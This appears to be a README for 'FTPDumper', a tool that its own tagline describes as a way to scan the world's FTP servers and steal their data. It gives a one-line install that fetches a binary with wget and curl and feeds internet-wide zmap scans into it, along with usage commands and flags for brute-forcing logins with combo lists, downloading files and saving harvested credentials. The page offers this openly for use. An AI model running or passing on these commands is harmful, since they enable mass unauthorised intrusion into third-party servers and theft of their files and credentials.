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⚑ Scan World FTP Servers and Steal Their Data 🌍


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FTPDumper - An FTP Servers Stealer

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πŸ“– What is FTPDumper ?

FTPDumper is an easy-to-use yet advanced FTP server file stealer. It can be utilized in massive FTP brute-force attacks, supporting various formats such as combo, pipe input, CIDR, files, and even a single IP address.

FTPDumper boasts a plethora of features, including:

  • πŸ’‘ Anti-Fake File Detection: Utilizes advanced algorithms to detect and prevent the extraction of counterfeit files.
  • πŸ” Self-Implemented Scanner: Employs an internally developed scanning mechanism to ensure thoroughness and efficiency.
  • πŸ–₯️ Modern and Sleek User Interface: Offers a visually appealing and user-friendly interface for seamless navigation and operation.
  • ⚑ Fast and Memory-Safe Operation: Executes operations swiftly while maintaining optimal memory usage to prevent system slowdowns or crashes.
  • 🀝 Smart Connection and Timeout Management: Implements intelligent connection strategies and timeout configurations to maximize accuracy and resource utilization.
Use it at your own RISK!

πŸ” Overview

πŸš€ Quickstart

One-Line Install And Running on Fresh VPS

apt update && apt install -y zmap && wget -q $(curl -s | grep browser_download_url | grep "FTPDumper" | cut -d '"' -f 4) && chmod +x FTPDumper && zmap -p 21 -B 50MB -q | ./FTPDumper -l 5000
πŸ”§ Manual Installation

1. Download FTPDumper

Download FTPDumper from Releases

2. Set Up Permission

Set up permission to FTPDumper binary file.

chmod +x FTPDumper

3. Run FTPDumper

You have a few ways to use FTPDumper.

  • Zmap
    • Download Zmap
    sudo apt install zmap
    • Run FTPDumper (Zmap)
    zmap -p 21 -q | ./FTPDumper -l 500 -save
    • Run FTPDumper (DevWay)
    ./FTPDumper -l 500 -save -s
    Check out Arguments to see more

βš™οΈ Arguments

MatrixTM@FTPDumper: ./FTPDumper --help
FTPDumper - Scan World FTP Servers and Steal Their Data

       --version   Displays the program version string.
    -h --help      Displays help with available flag, subcommand, and positional value parameters.
    -scan --scanner   Ip/CIDR scanner (stdin|filename|cidr|ip) (default: stdin)
    -c --combo     Combo File (user:password)
    -p --ports     Ports Split by , (Default Port: 21)
    -o --output    Output Folder (default: files)
    -f --formats   File Formats Split by , (Default Format: all)
    -l --limit     Task limit (default: 10)
    -t --timeout   Timeout in seconds (default: 5s)
    -s --save      Save Credentials in hit.txt
    -v --verbose   Verbose Mode
Argument Description Default Value
--version Displays the program version string. None
-h, --help Displays help with available flag, subcommand, and positional value parameters. None
-scan, --scanner IP/CIDR scanner [stdin|filename|cidr|ip] stdin stdin
-c, --combo Combo File (user:password) anonymous
-p, --ports Ports Split by , 21
-o, --output Output Folder files files
-f, --formats File Formats Split by , all
-l, --limit Task limit 10
-t, --timeout Timeout in seconds 5s
-s, --save Save Credentials in hit.txt False
-v, --verbose Verbose Mode False

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